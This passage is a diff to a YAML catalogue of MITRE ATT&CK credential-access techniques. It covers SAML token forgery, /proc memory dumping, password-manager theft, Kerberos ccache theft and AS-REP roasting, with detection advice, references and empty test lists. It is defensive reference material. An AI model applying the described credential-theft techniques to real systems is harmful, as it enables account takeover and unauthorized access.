+        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+      - source_name: ired Dumping LSA Secrets
+        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+          Retrieved February 21, 2020.
+        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+      - source_name: Microsoft AD Admin Tier Model
+        description: Microsoft. (2019, February 14). Active Directory administrative
+          tier model. Retrieved February 21, 2020.
+        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+      - source_name: Passcape LSA Secrets
+        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+          2020.
+        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+      - source_name: Powersploit
+        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+        url: https://github.com/mattifestation/PowerSploit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.004
     atomic_tests: []
   T1606.002:
     technique:
-      modified: '2024-03-01T17:55:56.116Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Forge Web Credentials: SAML token'
       description: |-
         An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
 
         An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
 
-        An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+        An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Blake Strom, Microsoft 365 Defender
       - Oleg Kolesnikov, Securonix
@@ -43912,14 +44563,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
       - SaaS
       - Windows
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -43960,14 +44611,11 @@ credential-access:
         url: https://www.sygnia.co/golden-saml-advisory
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1606.002
     atomic_tests: []
   T1003.007:
     technique:
-      modified: '2024-04-10T16:41:01.496Z'
+      modified: '2024-10-15T15:13:32.253Z'
       name: 'OS Credential Dumping: Proc Filesystem'
       description: |-
         Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
@@ -44030,81 +44678,79 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.007
     atomic_tests: []
   T1555.005:
     technique:
+      modified: '2024-08-19T13:53:33.661Z'
+      name: Password Managers
+      description: |-
+        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_contributors:
+      - Matt Burrough, @mattburrough, Microsoft
+      x_mitre_deprecated: false
+      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+        for suspicious activity that could indicate searching in process memory of
+        password managers. \n\nConsider monitoring file reads surrounding known password
+        manager applications."
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Matt Burrough, @mattburrough, Microsoft
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      - 'Process: OS API Execution'
+      - 'File: File Access'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
       created: '2021-01-22T16:08:40.629Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1555.005
         url: https://attack.mitre.org/techniques/T1555/005
-      - source_name: ise Password Manager February 2019
-        url: https://www.ise.io/casestudies/password-manager-hacking/
-        description: 'ise. (2019, February 19). Password Managers: Under the Hood
-          of Secrets Management. Retrieved January 22, 2021.'
+        external_id: T1555.005
+      - source_name: Cyberreason Anchor December 2019
+        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+          10, 2020.'
+        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
       - source_name: FoxIT Wocao December 2019
-        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
         description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
           Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
           October 8, 2020.'
+        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+      - source_name: ise Password Manager February 2019
+        description: 'ise. (2019, February 19). Password Managers: Under the Hood
+          of Secrets Management. Retrieved January 22, 2021.'
+        url: https://www.ise.io/casestudies/password-manager-hacking/
       - source_name: Github KeeThief
-        url: https://github.com/GhostPack/KeeThief
         description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
           2021.
+        url: https://github.com/GhostPack/KeeThief
       - source_name: NVD CVE-2019-3610
-        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
         description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
           Detail. Retrieved April 14, 2021.
-      - source_name: Cyberreason Anchor December 2019
-        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
-        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
-          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
-          10, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Password Managers
-      description: |-
-        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
-        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
-         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
-        for suspicious activity that could indicate searching in process memory of
-        password managers. \n\nConsider monitoring file reads surrounding known password
-        manager applications."
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      - 'Process: OS API Execution'
-      - 'File: File Access'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -44189,12 +44835,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1552.002:
     technique:
-      modified: '2023-07-28T18:29:56.525Z'
+      modified: '2024-10-15T16:26:46.873Z'
       name: 'Unsecured Credentials: Credentials in Registry'
       description: |-
         Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -44243,38 +44888,13 @@ credential-access:
         url: https://pentestlab.blog/2017/04/19/stored-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.002
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -44298,76 +44918,129 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
-  T1558.004:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1558.005:
+    technique:
+      modified: '2024-10-14T21:26:37.856Z'
+      name: Ccache Files
+      description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+        credential cache files (or ccache). These files are used for short term storage
+        of a user's active session credentials. The ccache file is created upon user
+        authentication and allows for access to multiple services without the user
+        having to re-enter credentials. \n\nThe <code>/etc/krb5.conf</code> configuration
+        file and the <code>KRB5CCNAME</code> environment variable are used to set
+        the storage location for ccache entries. On Linux, credentials are typically
+        stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+        On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+        naming scheme. Typically, users interact with ticket storage using <code>kinit</code>,
+        which obtains a Ticket-Granting-Ticket (TGT) for the principal; <code>klist</code>,
+        which lists obtained tickets currently held in the credentials cache; and
+        other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+        Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+        on disk and authenticate as the current user without their password to perform
+        [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+        Adversaries can also use these tickets to impersonate legitimate users with
+        elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+        Tools like Kekeo can also be used by adversaries to convert ccache files to
+        Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+        On macOS, adversaries may use open-source tools or the Kerberos framework
+        to interact with ccache files and extract TGTs or Service Tickets via lower-level
+        APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+        Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Nisani, Cymptom
-      - James Dunn, @jamdunnDFW, EY
-      - Swapnil Kumbhar
-      - Jacques Pluviose, @Jacqueswildy_IT
-      - Dan Nutting, @KerberToast
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Access'
       type: attack-pattern
-      created: '2020-08-24T13:43:00.028Z'
+      id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+      created: '2024-09-17T15:02:31.324Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1558.004
-        url: https://attack.mitre.org/techniques/T1558/004
-      - source_name: Harmj0y Roasting AS-REPs Jan 2017
-        url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
-        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
-          24, 2020.
-      - source_name: Microsoft Kerberos Preauth 2014
-        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
-        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
-          It Should Not Be Disabled. Retrieved August 25, 2020.'
-      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
-        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
-        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
-          with AS-REP Roasting. Retrieved August 24, 2020.
-      - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        source_name: SANS Attacking Kerberos Nov 2014
-        url: https://redsiege.com/kerberoast-slides
-      - url: https://adsecurity.org/?p=2293
-        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
-          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
-          Domain. Retrieved March 22, 2018.
-        source_name: AdSecurity Cracking Kerberos Dec 2015
-      - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        source_name: Microsoft Detecting Kerberoasting Feb 2018
-      - source_name: Microsoft 4768 TGT 2017
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
-        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
-          ticket (TGT) was requested. Retrieved August 24, 2020.'
-      modified: '2021-06-07T19:23:33.039Z'
+        url: https://attack.mitre.org/techniques/T1558/005
+        external_id: T1558.005
+      - source_name: Binary Defense Kerberos Linux
+        description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+          October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+          APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+        url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+      - source_name: Kerberos GNU/Linux
+        description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+          Compendium (GNU/Linux). Retrieved September 17, 2024.
+        url: https://adepts.of0x.cc/kerberos-thievery-linux/
+      - source_name: Kekeo
+        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+        url: https://github.com/gentilkiwi/kekeo
+      - source_name: SpectorOps Bifrost Kerberos macOS 2019
+        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+          Retrieved October 6, 2021.
+        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+      - source_name: Brining MimiKatz to Unix
+        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+          Mimikatz et al to UNIX. Retrieved October 13, 2021.
+        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+      - source_name: Linux Kerberos Tickets
+        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+          Teams. Retrieved October 4, 2021.
+        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1558.004:
+    technique:
+      modified: '2024-10-15T15:32:07.850Z'
       name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
       description: "Adversaries may reveal credentials of accounts that have disabled
         Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
@@ -44402,6 +45075,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Yossi Nisani, Cymptom
+      - James Dunn, @jamdunnDFW, EY
+      - Swapnil Kumbhar
+      - Jacques Pluviose, @Jacqueswildy_IT
+      - Dan Nutting, @KerberToast
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -44409,32 +45089,68 @@ credential-access:
         pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
         Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
         Microsoft 4768 TGT 2017)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Credential Request'
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Valid domain account
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      created: '2020-08-24T13:43:00.028Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1558/004
+        external_id: T1558.004
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+      - source_name: Harmj0y Roasting AS-REPs Jan 2017
+        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+          23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+          with AS-REP Roasting. Retrieved August 24, 2020.
+        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
+      - source_name: AdSecurity Cracking Kerberos Dec 2015
+        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+          Domain. Retrieved March 22, 2018.
+        url: https://adsecurity.org/?p=2293
+      - source_name: Microsoft 4768 TGT 2017
+        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+          ticket (TGT) was requested. Retrieved August 24, 2020.'
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+      - source_name: Microsoft Kerberos Preauth 2014
+        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+          It Should Not Be Disabled. Retrieved August 25, 2020.'
+        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.004
     atomic_tests: []
   T1558:
     technique:
-      modified: '2024-03-01T16:58:02.395Z'
+      modified: '2024-09-17T19:49:11.455Z'
       name: Steal or Forge Kerberos Tickets
       description: |
         Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
 
         On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
-        Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
-        Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
@@ -44470,7 +45186,7 @@ credential-access:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Logon Session: Logon Session Metadata'
@@ -44495,13 +45211,6 @@ credential-access:
         description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
           using Azure Security Center. Retrieved March 23, 2018.
         url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Kekeo
-        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
-        url: https://github.com/gentilkiwi/kekeo
-      - source_name: SpectorOps Bifrost Kerberos macOS 2019
-        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
-          Retrieved October 6, 2021.
